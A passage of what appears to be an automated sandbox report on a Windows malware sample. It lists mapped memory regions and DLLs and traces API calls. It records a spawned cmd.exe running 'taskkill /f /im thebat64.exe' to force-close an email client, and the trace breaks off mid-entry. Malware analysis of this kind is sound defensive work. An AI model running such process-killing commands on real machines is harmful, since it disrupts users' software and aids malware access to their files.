filename = "" Region: id = 5434 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5435 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5436 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5437 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5438 start_va = 0x4400000 end_va = 0x46cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 5439 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5440 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5441 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5442 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5443 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5444 start_va = 0x45d0000 end_va = 0x46cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 5445 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5446 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5447 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5448 start_va = 0x4170000 end_va = 0x41affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 5449 start_va = 0x41b0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041b0000" filename = "" Region: id = 5450 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5451 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5452 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5453 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5454 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5455 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5456 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5457 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5458 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5459 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5460 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5461 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5462 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5463 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5464 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5465 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5466 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5467 start_va = 0x46d0000 end_va = 0x489ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 5468 start_va = 0x4130000 end_va = 0x4159fff monitored = 0 entry_point = 0x4135680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5469 start_va = 0x46d0000 end_va = 0x4857fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046d0000" filename = "" Region: id = 5470 start_va = 0x4890000 end_va = 0x489ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 5471 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5472 start_va = 0x48a0000 end_va = 0x4a20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048a0000" filename = "" Region: id = 5473 start_va = 0x4a30000 end_va = 0x5e2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a30000" filename = "" Region: id = 5474 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5475 start_va = 0x4130000 end_va = 0x4130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004130000" filename = "" Region: id = 5476 start_va = 0x4140000 end_va = 0x4144fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 5477 start_va = 0x4150000 end_va = 0x4150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 5478 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 5479 start_va = 0x5e30000 end_va = 0x6166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5480 start_va = 0x44c0000 end_va = 0x45a9fff monitored = 0 entry_point = 0x44fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5481 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 5482 start_va = 0x44d0000 end_va = 0x45affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5483 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5484 start_va = 0x45b0000 end_va = 0x45b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 5485 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5486 start_va = 0x45c0000 end_va = 0x45c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045c0000" filename = "" Region: id = 5487 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5488 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5489 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5490 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5491 start_va = 0x6170000 end_va = 0x61affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006170000" filename = "" Region: id = 5492 start_va = 0x61b0000 end_va = 0x61effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061b0000" filename = "" Region: id = 5493 start_va = 0x61f0000 end_va = 0x622ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061f0000" filename = "" Region: id = 5494 start_va = 0x6230000 end_va = 0x626ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006230000" filename = "" Region: id = 5495 start_va = 0x6270000 end_va = 0x62affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006270000" filename = "" Region: id = 5496 start_va = 0x62b0000 end_va = 0x62effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062b0000" filename = "" Region: id = 5497 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5498 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5499 start_va = 0x4860000 end_va = 0x4865fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004860000" filename = "" Thread: id = 384 os_tid = 0x1304 Thread: id = 385 os_tid = 0x958 Thread: id = 386 os_tid = 0x13c4 Thread: id = 387 os_tid = 0xb68 Thread: id = 388 os_tid = 0xc60 Process: id = "77" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2d79f000" os_pid = "0xd30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im thebat64.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5503 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5504 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5505 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5506 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5507 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5508 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5509 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5510 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5511 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5512 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5513 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 5514 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5515 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5516 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5517 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5518 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5519 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5520 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5521 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 5522 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5523 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5524 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5525 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5526 start_va = 0x500000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5527 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5528 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5529 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5530 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5531 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5532 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5533 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5534 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 5535 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 5536 start_va = 0x7f0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 5537 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5538 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5539 start_va = 0x8e0000 end_va = 0xc16fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 392 os_tid = 0xd18 [0223.802] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0223.802] __set_app_type (_Type=0x1) [0223.802] __p__fmode () returned 0x74974d6c [0223.802] __p__commode () returned 0x74975b1c [0223.802] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0223.802] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0223.803] GetCurrentThreadId () returned 0xd18 [0223.803] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd18) returned 0x78 [0223.803] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0223.803] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0223.803] SetThreadUILanguage (LangId=0x0) returned 0x409 [0223.833] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0223.833] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0223.834] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0223.834] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0223.834] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0223.834] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0223.834] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0223.834] GetConsoleOutputCP () returned 0x1b5 [0223.835] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0223.835] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0223.835] _get_osfhandle (_FileHandle=1) returned 0x13c [0223.835] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0223.835] _get_osfhandle (_FileHandle=1) returned 0x13c [0223.836] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0223.836] _get_osfhandle (_FileHandle=0) returned 0x130 [0223.836] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0223.836] GetEnvironmentStringsW () returned 0x5f7cc0* [0223.836] GetProcessHeap () returned 0x5f0000 [0223.836] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa1a) returned 0x5f86e8 [0223.836] FreeEnvironmentStringsA (penv="A") returned 1 [0223.836] GetProcessHeap () returned 0x5f0000 [0223.836] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4) returned 0x5f0550 [0223.836] GetEnvironmentStringsW () returned 0x5f7cc0* [0223.836] GetProcessHeap () returned 0x5f0000 [0223.836] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa1a) returned 0x5f9110 [0223.837] FreeEnvironmentStringsA (penv="A") returned 1 [0223.837] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0223.837] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0223.837] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0223.837] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0223.837] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0223.837] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0223.837] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0223.837] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0223.837] RegCloseKey (hKey=0x88) returned 0x0 [0223.838] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0223.838] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0223.838] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, 